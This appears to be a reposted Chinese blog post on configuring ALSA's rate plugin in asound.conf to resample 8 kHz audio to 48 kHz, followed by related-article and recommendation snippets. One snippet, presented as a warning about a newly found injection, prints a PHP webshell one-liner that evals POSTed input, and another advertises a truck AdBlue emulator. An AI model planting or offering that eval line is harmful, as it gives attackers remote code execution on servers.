转自：http://www.voidcn.com/article/p-snamarwr-p.html

一、ALSA介绍：

1、简介：

高级Linux声音体系（英语：Advanced LinuxSound Architecture，缩写为ALSA）是Linux内核中，为声卡提供的驱动组件，以替代原先的OSS（开放声音系统）。一部分的目的是支持声卡的自动配置，以及完美的处理系统中的多个声音设备，这些目的大多都已达到。另一个声音框架JACK使用ALSA提供低延迟的专业级音频编辑和混音能力。

Jaroslav Kysela过去是这个项目的领导者，这个项目开始于为1998年Gravis Ultrasound所开发的驱动，它一直作为一个单独的软件包开发，直到2002年他被引进入Linux内核的开发版本 (2.5.4-2.5.5)。从2.6版本开始ALSA成为Linux内核中默认的标准音频驱动程序集，OSS则被标记为废弃。

ALSA是一个完全开放源代码的音频驱动程序集，除了像OSS那样提供了一组内核驱动程序模块之外，ALSA还专门为简化应用程序的编写提供了相应的函数库，与OSS提供的基于ioctl的原始编程接口相比，ALSA函数库使用起来要更加方便一些。利用该函数库，开发人员可以方便快捷的开发出自己的应用程序，细节则留给函数库内部处理。当然ALSA也提供了类似于OSS的系统接口，不过ALSA的开发者建议应用程序开发者使用音频函数库而不是驱动程序的API。

2、分层

ALSA体系主要分为三层，按照调用关系依次是，app、alsa-lib、kerneldriver。

3、kernel driver层简述：

Kernel driver 层，为内核驱动代码，主要在内核源码中的sound目录下，负责对硬件进行控制与操作。驱动创建的设备文件，在文件系统中的/dev/snd/目录下。注意，应用层使用alsa-API中打开的设备文件，并不是/dev/snd/目录下的文件，而是alsa-lib对设备的再一次封装的产物，叫做plugins，如plughw:0,0 ，后面详细解释。

alsa驱动的设备文件结构: 字符设备
# ls /dev/snd/ -lh
total 0
crw-rw----    1 root     root      116,   0 Aug 21 16:01 controlC0
crw-rw----    1 root     root      116,  24 Aug 21 16:01 pcmC0D0c
crw-rw----    1 root     root      116,  16 Aug 21 16:01 pcmC0D0p
crw-rw----    1 root     root      116,  25 Aug 21 16:01 pcmC0D1c
crw-rw----    1 root     root      116,  17 Aug 21 16:01 pcmC0D1p
crw-rw----    1 root     root      116,  26 Aug 21 16:01 pcmC0D2c
crw-rw----    1 root     root      116,  33 Aug 21 16:01 timer
controlC0               用于声卡的控制，例如通道选择，混音，麦克风的控制等
pcmC0D0c             用于录音的pcm设备
pcmC0D0p             用于播放的pcm设备
timer                       定时器
C0D0代表的是声卡0中的设备0，pcmC0D0c最后一个c代表capture，pcmC0D0p最后一个p代表playback，这些都是alsa-driver中的命名规则。

4、alsa-lib层简述：

Alsa-lib层，为不同的驱动提供统一的接口alsa API，简化了开发人员对于驱动层的调用开发。主要有如下接口

网址：https://www.alsa-project.org/alsa-doc/alsa-lib/

The currently designed interfaces are listed below:

Information Interface (/proc/asound)

Control Interface (/dev/snd/controlCX)

Mixer Interface (/dev/snd/mixerCXDX)

PCM Interface (/dev/snd/pcmCXDX)

Raw MIDI Interface (/dev/snd/midiCXDX)

Sequencer Interface (/dev/snd/seq)

Timer Interface (/dev/snd/timer)

我们在应用中，主要使用的是 PCM 接口。如Snd_pcm_open()函数。

除了Alsa-API接口以外，alsa-lib还可以通过配置文件，开放其附加功能，如采样率转换、软件混音等。

我们就是利用alsa-lib的附加功能实现我们的重采样功能，修改的地方主要包括alsa-lib的配置和APP调用两方面。下一章对如何利用alsa-lib的配置文件开放其采样率转换功能进行描述。

二、配置文件asound.conf：

asound.conf配置文件，是alsa-lib的默认配置文件，路径在 /etc/，可以用来配置alsa库的一些附加功能。这个文件不是alsa库运行时所必须的，没有它alsa库也可以正常运行。

关于asound.conf的配置，可以参考以下文档：

http://www.alsa-project.org/main/index.php/Asoundrc

先阐述一些重要的名词：

Card：声卡，直接对应硬件，ID从0开始计数。

Device：设备，在一个card上，可以有多个device，每个device可以独立被打开和使用，ID从0开始计数。

Plugin：插件，前文说过，应用层调用alsa库时，操作的并不是驱动层创建的设备文件，而是这个plugins，plugin是alsa库对音频处理设备的抽象，hw plugin为硬件设备抽象出的plugin，是最基础的模块，不需要对alsa-lib进行配置即可使用，我们常见的plughw:0,0含义就是类型为hw的plugin，编号声卡0上面的设备0。除了hw类型的plugin外，还有一些纯软件实现的模块，可以用来进行音频处理，例如，可以实现音频采样率转换的rate plugin，可以用来混音的dmix plugin等等。

Slave：从属设备，可以把几个plugin连接起来，sink端的设备就是source端设备的slave。

需要使用这些附加的plugin，就要对配置文件（asound.conf）进行配置，这个配置是实时生效的，所以我们不必修改文件系统中的文件，而是在运行我们的应用程序之前，将自己的配置文件拷贝到/etc/下，对默认的配置文件进行覆盖就行了。

具体如何配置，书写格式，请参看Asoundrc文档。

以下就是我的配置，

pcm_slave.sl2 {

pcm"plughw:0,1"

rate48000

}

pcm.rate_convert {

typerate

slavesl2

}

这个配置的含义是，

下面一段：创建一个使用pcm API接口的设备，叫做rate_convert，它的类型是rate（可以实现采样率转换的plugin），它有一个slave叫做sl2；

上面一段：定义一个使用pcm接口的slave，叫做sl2，他实际上是plughw:0,1这个设备的别名，即等同于plughw:0,1（对应我用于播放的AIC3104芯片），这个设备需要的采样率是48KHz。

通过这个配置，就可以在app中，使用pcm API打开rate_convert这个设备，并把解码后的8K采样率的PCM数据，直接使用snd_pcm_writei写入设备，rate_convert这个设备就可以自动将PCM数据重采样至48KHz，然后自动传递给plughw:0,1进行播放。

在看Asoundrc的文档中，一直不明白，为什么在配置文件中，只有输出的采样率配置，而没有输入的采样率配置，要重采样，alsa-lib总得知道把啥转换成48K吧，

在实践中发现，可以通过APP调用alsa-API中的snd_pcm_hw_params_set_rate_near()函数将数据源的采样率为8K传递给alsa-lib。下面一章对app调用alsa-API进行说明。

三、App调用方法：

在app调用这块儿，其他的通用调用流程在这里就不累述了，使用个项目原来的那套代码就行，只有三块儿需要修改和注意：

1、使用snd_pcm_open()打开的设备文件rate_convert（不需再打开plughw:0,1了），PCM数据的原始采样率，用snd_pcm_hw_params_set_rate_near()对rate_convert进行配置。

2、重要的参数Period_size，即播放周期大小，单位为Byte，需使用snd_pcm_hw_params_set_period_size_near()进行配置，如果period_size配的不对，或者不配置，会发生underRun，播放声音断断续续。

8K pcm，配置sample_rate为8000，配置period_size为256

48K pcm，配置sample_rate为48000，配置period_size为1024

3、配置负责playback的AIC3104的采样率为48K

四、未尽之处：

在研究alsa-lib的调用时，还有一些没有搞明白的地方，这里记录下来，将来大家有时间可以研究研究。

1、我的设备上音频输入输出分开使用了两块AIC3104，这样重采样后G711的自编自解就不成问题，因为输入的AIC3104设为8K，输出的AIC3104设为48K播放重采样后的数据，如果系统中只使用一块AIC3104,就必须对输入的PCM数据也进行一次重采样，这里没有进行研究。

2、多设备绑定，假如我们系统中有多个playback设备，现在的做法是启两个线程，分别写入数据，如果可以使用alsa-lib的slave配置将多个设备进行绑定，例如一个rate plugin绑定两个 hw plugin，然后只需向这一个rate plugin写入数据即可，不会遇到两个播放线程同步的问题，我试了一下，只能绑定一个slave，再多绑一个，第一个slave就会没有播放声音。

3、混音功能，这个混音功能看似是非常强大的，它可以把多个不同采样率的通道，混合成一路统一采样率的数据进行播放，如果我们以后可以进行多路解码，或者要实现视频会议中MCU的功能，那势必要用到这个功能，在这里还没有进行深究。

【改】利用ALSA库进行音频重采样的更多相关文章

利用 wave 库对音频进行格式处理
import wave r = r"D:\沫沫酱 - 旧伤口.wav" # 一个.wav格式文件 with wave.open(r, "rb") as f: # ...
Linux音频编程--使用ALSA库播放wav文件
在UBUNTU系统上使用alsa库完成了对外播放的wav文件的案例. 案例代码: /** *test.c * *注意:这个例子在Ubuntu 12.04.1环境下编译运行成功. * */ #inclu ...
Android : 基于alsa库的音乐播放
继上篇:Android : alsa-lib 移植 ,这篇随笔实现一个demo基于移植好的alsa库在Android平台上播放wav文件: 一.利用ffmeg将一个mp3文件转换成wav文件: (1) ...
简洁明了的插值音频重采样算法例子 (附完整C代码)
近一段时间在图像算法以及音频算法之间来回游走. 经常有一些需求,需要将音频进行采样转码处理. 现有的知名开源库,诸如: webrtc , sox等, 代码阅读起来实在闹心. 而音频重采样其实也就是插值 ...
Android OpenSL ES 开发：OpenSL ES利用SoundTouch实现PCM音频的变速和变调
缘由 OpenSL ES 学习到现在已经知道 OpenSL ES 不仅能播放和录制PCM音频数据,还能改变声音大小.设置左声道或右声道播放.还能变速播放,可谓是播放音频的王者.但是变速有一点不好的就是 ...
FFmpeg进行视频帧提取&音频重采样-Process.waitFor()引发的阻塞超时
由于产品需要对视频做一系列的解析操作,利用FFmpeg命令来完成视频的音频提取.第一帧提取作为封面图片.音频重采样.字幕压缩等功能: 前一篇文章已经记录了FFmpeg在JAVA中的使用-音频提取&am ...
FFmpeg(11)-基于FFmpeg进行音频重采样(swr_init(), swr_convert())
一.包含头文件和库文件修改CMakeLists # swresample add_library(swresample SHARED IMPORTED) set_target_properties( ...
人脸检测及识别python实现系列（5）——利用keras库训练人脸识别模型
人脸检测及识别python实现系列(5)——利用keras库训练人脸识别模型经过前面稍显罗嗦的准备工作,现在,我们终于可以尝试训练我们自己的卷积神经网络模型了.CNN擅长图像处理,keras库的te ...
基于傅里叶变换的音频重采样算法 (附完整c代码)
前面有提到音频采样算法: WebRTC 音频采样算法附完整C++示例代码简洁明了的插值音频重采样算法例子 (附完整C代码) 近段时间有不少朋友给我写过邮件,说了一些他们使用的情况和问题. 坦白讲, ...

随机推荐

跨站访问如何保证session的正常使用
1.最近公司开发了一个网站项目,一切顺利.由于网页没有兼容手机浏览器,后来添加了一个webapp端,独立于另一个站点,用于解决兼容手机浏览器的问题.其中webapp端的数据全部通过ajax进行请求另一 ...
android 开发设计模式---单例模式
要保证单例,需要做以下几步必须防止外部可以调用构造函数进行实例化,因此构造函数必须私有化. 必须定义一个静态函数获得该单例单例使用volatile修饰使用synchronized 进行同步处理, ...
html5 css练习画廊元素旋转
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8&qu ...
发现一个新的注入代码 eval
下面这句代码,就是一段恶意的代码,通过form POST 提交数据即可生成脚本文件. eval('?>' . file_get_contents('php://input'));
Oracle树查询及相关函数
Oracle树查询的最重要的就是select...start with... connect by ...prior 语法了.依托于该语法,我们可以将一个表形结构的中以树的顺序列出来.在下面列述了Or ...
Simple Factory Pattern
Question: How do you achieve the functions of calculator by Object-Oriented ? Analysis: 1,The functi ...
Oarcle 之DML
DML:数据操纵语言(Data Manipulation Language, DML)是SQL语言中,负责对数据库对象运行数据访问工作的指令集,以INSERT.UPDATE.DELETE三种指令为核心 ...
Truck Adblue Emulator For SCANIA
For sale online Truck Adblue Emulator For SCANIA See the price Where to buy? Truck Adblue Emulator F ...
我的web前端整理和学习
知识点收藏:(边看.边记录.边写) 开直播学习:虎牙待办事理>> 练习自我表达(把文章做成视频).技术学习总结(博客与公众号).跳出舒适圈. 前端知识体系:https://www.cnb ...
算法（第四版）C# 习题题解——2.5
写在前面整个项目都托管在了 Github 上:https://github.com/ikesnowy/Algorithms-4th-Edition-in-Csharp 查找更方便的版本见:https ...

【改】利用ALSA库进行音频重采样